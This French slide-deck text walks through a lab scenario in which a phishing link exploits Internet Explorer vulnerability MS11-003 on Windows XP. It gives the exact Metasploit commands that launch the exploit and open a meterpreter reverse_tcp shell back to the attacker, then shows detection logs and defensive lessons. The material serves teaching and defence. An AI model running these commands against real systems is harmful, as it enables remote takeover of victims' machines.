2. Scénario 1: Topologie
Target Firewall Attacker
Gateway
192.168.111.0/24 192.168.178.0/24
Target :
- Windows XP SP3 - L’utilisateur utilise un compte admin
- IP : 192.168.111.129 - Gateway par défaut : 192.168.111.128
- Pas d’anti-virus / Firewall Windows Windows activé
- Vulnérable à MS11-003
Firewall Gateway :
- Eth0 : 192.168.111.128 (interface interne)
- Eth1 : 192.168.178.59 (interface externe)
Attacker :
- IP : 192.168.178.21
3. Scénario 1: Règles Firewall
• L’administration du Firewall s’effectue par SSH par le biais du réseau local.
• Le réseau interne peut effectuer des requêtes «Any» vers le réseau externe
4. Scénario 1: Story-Board
✤ Cette topologie réseau correspond à la plupart des réseaux ADSL d’internautes et aussi
à la configuration réseau classique des petites et moyennes entreprises.
✤ L’attaquant envoi un message Twitter à la victime. Le message contient une URL
malveillante (qui peut être réduite) qui exploitera la vulnérabilité Internet Explorer
MS11-003.
✤ La victime clique sur le lien fournis et la vulnérabilité MS11-003 est exploitée.
✤ Après l’exploitation de la vulnérabilité un «payload» meterpreter reverse_tcp est initié
sur le port 4444/TCP de l’attaquant.
✤ Aucune post exploitations ne sera abordée dans ce scénario.
5. Scénario 1: Commandes
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 80
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
ipconfig
route
getuid
6. Scénario 1: Evidences
Un processus Internet Explorer est créé :
A new process has been created:
New Process ID:
3200
Image File Name:
C:Program FilesInternet Exploreriexplore.exe
Creator Process ID:
2224
User Name:
romang
Domain:
ERIC-FD2123B3C5
Logon ID:
(0x0,0x62764)
Le processus Internet Explorer créé un nouveau processus «notepad.exe» :
A new process has been created:
New Process ID:
3972
Image File Name:
C:WINDOWSsystem32notepad.exe
Creator Process ID:
3200
User Name:
romang
Domain:
ERIC-FD2123B3C5
Logon ID:
(0x0,0x62764)
Les logs sur le Firewall :
Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00
PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
7. Scénario 1: Leçons apprises
•Mettre à jour son OS et ses applications !
•Ne pas exécuter les applications avec des privilèges administrateur !
•Ne jamais cliquer sur des liens inconnus, surtout raccourcis, provenant de sources !
•Installer un anti-virus et ne pas avoir confiance dans celui-ci :)
•Ne pas faire confiance à vos Firewall (locaux ou distant) !
•Ne pas autoriser des connexions sortantes du type «Any» depuis votre réseau interne
vers des réseaux qui ne sont pas de confiance ! Limiter les connexions sortantes à vos
véritables besoins.
7